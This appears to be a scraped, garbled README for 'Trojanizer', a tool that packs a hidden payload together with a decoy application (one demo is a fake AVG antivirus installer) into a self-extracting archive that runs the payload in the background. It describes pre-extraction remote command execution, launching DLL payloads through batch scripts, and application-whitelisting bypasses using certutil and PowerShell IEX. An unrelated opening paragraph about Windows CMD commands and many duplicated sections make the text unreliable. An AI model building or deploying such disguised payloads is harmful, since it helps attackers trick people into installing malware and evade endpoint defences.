TROJANIZER
Oct 27, 2016 An A-Z Index of the Windows CMD Command Lines. October 27, 2016 Views: 15920. TITLE Set the window title for a CMD.EXE session. External commands may be used under the CMD shell, PowerShell, or directly from START-RUN. In my case, only updates that install with an EXE were still available. The system I'm running PowerShell ISE on is a Windows 7 x64 Home Premium. I even tried installing the Windows Assessment and Deployment Kit. To use WSUS Offline Update download the zip file from the link above and unzip somewhere.
FRAMEWORK DESCRIPTION
'Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'
(execute the payload in background, while the legit application executes in foreground).
(execute the payload in background, while the legit application executes in foreground).
DEPENDENCIES (backend applications)
PAYLOADS (agents) ACCEPTED
LEGIT APPLICATIONS ACCEPTED (decoys)
ADVANCED SETTINGS
-- Presetup advanced option
Trojanizer can be configurated to execute a program + command before the extraction/executionof the two compressed files (SFX archive). This allow users to take advantage of pre-installedsoftware to execute a remote command before the actual extraction occurs in target system.If active, trojanizer will asks (zenity sandbox) for the command to be executed
Trojanizer can be configurated to execute a program + command before the extraction/executionof the two compressed files (SFX archive). This allow users to take advantage of pre-installedsoftware to execute a remote command before the actual extraction occurs in target system.If active, trojanizer will asks (zenity sandbox) for the command to be executed
-- single_file_execution
Lets look at the follow scenario: You have a dll payload to input that you need to executeupon extraction, but sfx archives can not execute directly dll files, This setting allowusers to input one batch script(.bat) that its going to be used to execute the dll payload.All that Trojanizer needs to Do its to instruct the SFX archive to extract both files andthem execute the script.bat
Lets look at the follow scenario: You have a dll payload to input that you need to executeupon extraction, but sfx archives can not execute directly dll files, This setting allowusers to input one batch script(.bat) that its going to be used to execute the dll payload.All that Trojanizer needs to Do its to instruct the SFX archive to extract both files andthem execute the script.bat
TROJANIZER AND APPL WHITELISTING BYPASSES
DOWNLOAD/INSTALL
Framework Screenshots
xsf.conf - execute both files upon extraction (trojan behavior)
xsf.conf - single_file_execution + Presetup (advanced options)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) - trojan behavior
Inside the sfx archive (open with winrar) - single_file_execution
xsf.conf - single_file_execution + Presetup (advanced options)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) - trojan behavior
Inside the sfx archive (open with winrar) - single_file_execution
Video tutorials
Trojanizer - AVG anti-virus fake installer (trojan behavior)
https://www.youtube.com/watch?v=BIn6_ccZrI0
https://www.youtube.com/watch?v=BIn6_ccZrI0
Trojanizer - single_file_execution (not trojan behavior)
https://www.youtube.com/watch?v=Ze0JkVtKbns
https://www.youtube.com/watch?v=Ze0JkVtKbns
Special thanks:
@subTee | @enigma0x3 | @H4d3s (SSA)
Referencies:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/